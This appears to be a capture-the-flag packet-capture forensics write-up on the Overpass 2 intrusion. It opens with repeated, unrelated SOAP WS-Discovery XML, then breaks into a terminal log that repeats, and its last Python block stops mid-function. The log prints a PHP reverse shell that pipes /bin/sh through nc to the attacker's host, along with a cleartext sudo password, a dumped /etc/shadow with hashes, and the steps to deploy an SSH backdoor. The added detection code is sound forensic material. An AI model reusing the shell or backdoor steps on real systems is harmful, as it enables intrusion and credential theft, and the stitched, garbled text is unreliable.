<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" 
remote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
| .. . |
| . + |
| o .=. |
| . o o+. |
| + S +. |
| =.o %. |
| ..*.% =. |
| .+.X+*.+ |
| .oo=++=Eo. |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
Using almost the same command, but with the filter and piping through strings so that only readable plain-text strings are shown, the output is much cleaner and we can see the password the attacker used in the command for privilege escalation: (whenevernoteartinstant):
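As an added example that is not part of the original writeup, here is the `tshark -T fields -e data | xxd -r -p | strings` pipeline reimplemented in Python over constructed sample hex lines, plus a small detector that pairs each password echoed at an su/sudo prompt with the account it was typed for (useful when triaging a capture for credentials exposed in cleartext); the function names and the sample payloads are assumptions.

```python
import re
from typing import Iterable

# Constructed stand-in for the output of `tshark -r capture.pcapng -T fields -e data`:
# one line per packet holding the TCP payload as hex; tshark joins several data
# fields of one packet with commas, and packets without a data field print an
# empty line. The payloads are modelled on the reverse-shell session in the
# capture, not copied from it.
CONSTRUCTED_TSHARK_LINES = [
    b"$ id\n".hex(),
    b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n".hex(),
    b"www-data@overpass-production:/var/www/html/development/uploads$ su james\n".hex()
    + "," + b"Password: whenevernoteartinstant\n".hex(),
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1".hex(),  # binary noise: yields no string
    "",                                            # packet without a data field
    (b"james@overpass-production:~$ sudo -l\n"
     b"[sudo] password for james: whenevernoteartinstant\n").hex(),
]


def decode_tshark_data_lines(lines: Iterable[str]) -> bytes:
    """Equivalent of `xxd -r -p`: turn the hex fields back into one byte stream."""
    out = bytearray()
    for line in lines:
        for field in line.strip().split(","):
            if field:
                out += bytes.fromhex(field)
    return bytes(out)


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Equivalent of `strings`: runs of printable ASCII at least min_len long.

    A newline is not printable, so it ends a run: each line typed in the
    reverse shell comes out as its own string, which the detector relies on.
    """
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


# `su <user>` either at the start of a string or right after a shell prompt,
# because `strings` glues the typed command onto the prompt that preceded it.
SU_RE = re.compile(r"(?:^|\$ )su\s+(\S+)$")
PASSWORD_RE = re.compile(r"^(?:\[sudo\] password for (\S+)|Password): (.+)$")


def find_cleartext_credentials(strings: list[str]) -> list[tuple[str, str]]:
    """Pair each password echoed at an su/sudo prompt with the account it unlocks.

    Without a tty the shell echoes what the attacker types, so the password
    follows the prompt in the same stream; a bare `Password:` prompt is
    attributed to the most recent `su <user>` command.
    """
    creds: list[tuple[str, str]] = []
    last_su_user = None
    for s in strings:
        m = SU_RE.search(s)
        if m:
            last_su_user = m.group(1)
            continue
        m = PASSWORD_RE.match(s)
        if m:
            creds.append((m.group(1) or last_su_user or "<unknown>", m.group(2)))
    return creds


def analyse(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Run the whole pipeline over tshark hex output lines."""
    return find_cleartext_credentials(extract_strings(decode_tshark_data_lines(lines)))


if __name__ == "__main__":
    for user, password in analyse(CONSTRUCTED_TSHARK_LINES):
        print(f"cleartext credential for {user}: {password}")
```

To run it on a real capture, feed the lines of `tshark -r overpass2.pcapng -T fields -e data` to `analyse` instead of the constructed list.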
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings
Running as user "root" and group "root". This could be dangerous.
Upload File
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.
www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 5% (1/18)
Unpacking objects: 5% (1/18)
Unpacking objects: 11% (2/18)
Unpacking objects: 16% (3/18)
Unpacking objects: 22% (4/18)
Unpacking objects: 27% (5/18)
Unpacking objects: 33% (6/18)
Unpacking objects: 38% (7/18)
remote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 44% (8/18)
Unpacking objects: 50% (9/18)
Unpacking objects: 55% (10/18)
Unpacking objects: 61% (11/18)
Unpacking objects: 66% (12/18)
Unpacking objects: 72% (13/18)
Unpacking objects: 77% (14/18)
Unpacking objects: 83% (15/18)
Unpacking objects: 88% (16/18)
Unpacking objects: 94% (17/18)
Unpacking objects: 100% (18/18)
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
| .. . |
| . + |
| o .=. |
| . o o+. |
| + S +. |
| =.o %. |
| ..*.% =. |
| .+.X+*.+ |
| .oo=++=Eo. |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
We search to see whether the attacker displayed or viewed his reverse shell script with cat; but it seems he did not cat it, we only saw a cat on .overpass (cat .overpass, followed by the output ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.):
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings | grep cat
Running as user "root" and group "root". This could be dangerous.
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
Your identification has been saved in id_rsa.
We filter on the word payload to try to see its contents; the only thing that stands out is that it apparently removes the file f from /tmp, which sounds to me like a privilege escalation, or it is the reverse shell:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 "payload"
Running as user "root" and group "root". This could be dangerous.
02b0 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68 name="payload.ph
02c0 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 p"..Content-Type
02d0 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d : application/x-
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
--
0110 65 20 66 69 6c 65 20 70 61 79 6c 6f 61 64 2e 70 e file payload.p
0120 68 70 20 68 61 73 20 62 65 65 6e 20 75 70 6c 6f hp has been uplo
0130 61 64 65 64 2e aded.
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 34 0a 2f 40 00 40 06 5a 13 c0 a8 aa 91 c0 a8 .4./@.@.Z.......
0020 aa 9f ba 76 00 50 9e c3 76 b3 3a 0d 13 1a 80 10 ...v.P..v.:.....
--
02d0 72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70 ref="payload.php
02e0 22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61 ">payload.php</a
02f0 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d ></td><td align=
0300 22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d "right">2020-07-
0310 32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c 21 20:34 </td><
0320 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 td align="right"
0330 3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e > 99 </td><td>&n
Now we filter on .php, which we know is the payload's extension:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"
Running as user "root" and group "root". This could be dangerous.
0390 74 68 69 6e 67 20 61 62 6f 75 74 20 70 68 70 20 thing about php
03a0 65 79 65 20 65 6e 20 65 79 65 3f 20 2d 2d 3e 0a eye en eye? -->.
03b0 20 20 20 20 20 20 3c 21 2d 2d 20 54 4f 44 4f 20 <!-- TODO
03c0 61 64 64 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 add downloading
03d0 6f 66 20 79 6f 75 72 20 6f 76 65 72 70 61 73 73 of your overpass
03e0 20 66 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 files -->.
--
0400 70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f pload.php" metho
0410 64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65 d="post" enctype
0420 3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d ="multipart/form
0430 2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20 -data">.
0440 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d <div class="form
0450 45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 Elem"><label for
--
0050 65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48 ent/upload.php H
0060 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 TTP/1.1..Host: 1
0070 39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a 92.168.170.159..
0080 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0090 6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69 lla/5.0 (X11; Li
00a0 6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36 nux x86_64; rv:6
--
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
0310 74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69 tmp/f|/bin/sh -i
0320 20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38 2>&1|nc 192.168
0330 2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f .170.145 4242 >/
--
02d0 72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70 ref="payload.php
02e0 22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61 ">payload.php</a
02f0 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d ></td><td align=
0300 22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d "right">2020-07-
0310 32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c 21 20:34 </td><
0320 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 td align="right"
0330 3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e > 99 </td><td>&n
--
0060 61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d ad.php HTTP/1.1.
0070 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31 .Host: 192.168.1
0080 37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65 70.159..User-Age
0090 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 nt: Mozilla/5.0
00a0 28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f (X11; Linux x86_
00b0 36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63 64; rv:68.0) Gec
--
00b0 61 64 2e 70 68 70 0d 0a ad.php..
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 34 77 58 40 00 40 06 ec e9 c0 a8 aa 91 c0 a8 .4wX@.@.........
0020 aa 9f 10 92 e1 50 67 a7 d4 c1 09 61 b0 98 80 10 .....Pg....a....
0030 01 fd ad d5 00 00 01 01 08 0a c2 14 45 11 35 50 ............E.5P
0040 cb ac ..
And bingo, this one caught my attention because of the POST method; the attacker's request would have to contain the script, and indeed we have it:
0400 70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f pload.php" metho
0410 64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65 d="post" enctype
0420 3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d ="multipart/form
0430 2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20 -data">.
0440 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d <div class="form
0450 45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 Elem"><label for
Now with a Wireshark filter we see this packet in full (http.request.uri contains "pload.php" && http.request.method == "POST"):
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 47734, Dst Port: 80, Seq: 1, Ack: 1, Len: 960
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 03 f4 0a 2e 40 00 40 06 56 54 c0 a8 aa 91 c0 a8 ....@.@.VT......
0020 aa 9f ba 76 00 50 9e c3 72 f3 3a 0d 12 27 80 18 ...v.P..r.:..'..
0030 01 f6 a9 f3 00 00 01 01 08 0a c2 13 a6 2b 35 50 .............+5P
0040 2c c6 50 4f 53 54 20 2f 64 65 76 65 6c 6f 70 6d ,.POST /developm
0050 65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48 ent/upload.php H
0060 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 TTP/1.1..Host: 1
0070 39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a 92.168.170.159..
0080 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0090 6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69 lla/5.0 (X11; Li
00a0 6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36 nux x86_64; rv:6
00b0 38 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 8.0) Gecko/20100
00c0 31 30 31 20 46 69 72 65 66 6f 78 2f 36 38 2e 30 101 Firefox/68.0
00d0 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 ..Accept: text/h
00e0 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f tml,application/
00f0 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 xhtml+xml,applic
0100 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c ation/xml;q=0.9,
0110 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 41 63 63 65 70 */*;q=0.8..Accep
0120 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 t-Language: en-U
0130 53 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 63 65 S,en;q=0.5..Acce
0140 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 pt-Encoding: gzi
0150 70 2c 20 64 65 66 6c 61 74 65 0d 0a 52 65 66 65 p, deflate..Refe
0160 72 65 72 3a 20 68 74 74 70 3a 2f 2f 31 39 32 2e rer: http://192.
0170 31 36 38 2e 31 37 30 2e 31 35 39 2f 64 65 76 65 168.170.159/deve
0180 6c 6f 70 6d 65 6e 74 2f 0d 0a 43 6f 6e 74 65 6e lopment/..Conten
0190 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 t-Type: multipar
01a0 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 t/form-data; bou
01b0 6e 64 61 72 79 3d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ndary=----------
01c0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
01d0 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 38 -180904902857998
01e0 37 30 33 31 35 31 35 32 36 30 30 30 36 0d 0a 43 7031515260006..C
01f0 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 ontent-Length: 4
0200 35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 54..Connection:
0210 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 70 67 72 keep-alive..Upgr
0220 61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 65 71 ade-Insecure-Req
0230 75 65 73 74 73 3a 20 31 0d 0a 0d 0a 2d 2d 2d 2d uests: 1....----
0240 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0250 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39 ---------1809049
0260 30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32 0285799870315152
0270 36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 60006..Content-D
0280 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d isposition: form
0290 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c -data; name="fil
02a0 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 eToUpload"; file
02b0 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68 name="payload.ph
02c0 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 p"..Content-Type
02d0 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d : application/x-
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
0310 74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69 tmp/f|/bin/sh -i
0320 20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38 2>&1|nc 192.168
0330 2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f .170.145 4242 >/
0340 74 6d 70 2f 66 22 29 3f 3e 0a 0d 0a 2d 2d 2d 2d tmp/f")?>...----
0350 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0360 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39 ---------1809049
0370 30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32 0285799870315152
0380 36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 60006..Content-D
0390 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d isposition: form
03a0 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 75 62 -data; name="sub
03b0 6d 69 74 22 0d 0a 0d 0a 55 70 6c 6f 61 64 20 46 mit"....Upload F
03c0 69 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ile..-----------
03d0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
03e0 2d 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 --18090490285799
03f0 38 37 30 33 31 35 31 35 32 36 30 30 30 36 2d 2d 87031515260006--
0400 0d 0a ..
WE SEE THE PAYLOAD SCRIPT IN CLEAN FORM:
payload.ph
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
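To triage an upload like this one from a capture without reading the hex dump by hand, the following added example (not part of the original writeup, and not code from the Overpass 2 room) parses a raw multipart/form-data POST, lists every form part, and flags the ones that look like a server-side script: executable extension, PHP content type declared by the client, a PHP open tag in the body, and a command-execution function inside it. The request bytes below are a constructed sample with the same layout as the captured upload (boundary, host and PHP body are placeholders); in practice the input would be the reassembled TCP stream exported from Wireshark or tshark.

```python
import re
from typing import Dict, List

# Constructed sample: a minimal HTTP POST to the same upload endpoint, rebuilt by hand
# for this example. It is NOT bytes taken from overpass2.pcapng; the boundary, host
# and PHP body are placeholders with the same multipart layout as the capture.
SAMPLE_REQUEST = (
    b"POST /development/upload.php HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: multipart/form-data; boundary=----ExampleBoundary42\r\n"
    b"\r\n"
    b"------ExampleBoundary42\r\n"
    b'Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"\r\n'
    b"Content-Type: application/x-php\r\n"
    b"\r\n"
    b'<?php exec("id"); ?>\n'
    b"\r\n"
    b"------ExampleBoundary42\r\n"
    b'Content-Disposition: form-data; name="submit"\r\n'
    b"\r\n"
    b"Upload File\r\n"
    b"------ExampleBoundary42--\r\n"
)

# PHP functions that hand a string to a shell or to the PHP interpreter.
RISKY_PHP = re.compile(rb"\b(exec|shell_exec|system|passthru|popen|proc_open|eval|assert)\s*\(")
EXEC_EXT = (".php", ".phtml", ".phar", ".php5", ".php7")
PHP_TYPES = {"application/x-php", "application/x-httpd-php", "text/x-php"}


def parse_header_lines(lines: List[bytes]) -> Dict[str, str]:
    """Turn 'Name: value' lines into a dict keyed by lower-cased header name."""
    headers: Dict[str, str] = {}
    for line in lines:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers


def boundary_from(content_type: str) -> str:
    """Extract the boundary parameter of a multipart Content-Type header."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no multipart boundary")
    return m.group(1)


def parse_multipart(body: bytes, boundary: str) -> List[dict]:
    """Split a multipart/form-data body into its parts (RFC 7578 framing)."""
    delimiter = b"--" + boundary.encode("latin-1")
    parts = []
    for chunk in body.split(delimiter)[1:]:      # [0] is the preamble (empty here)
        if chunk.startswith(b"--"):               # closing delimiter: no more parts
            break
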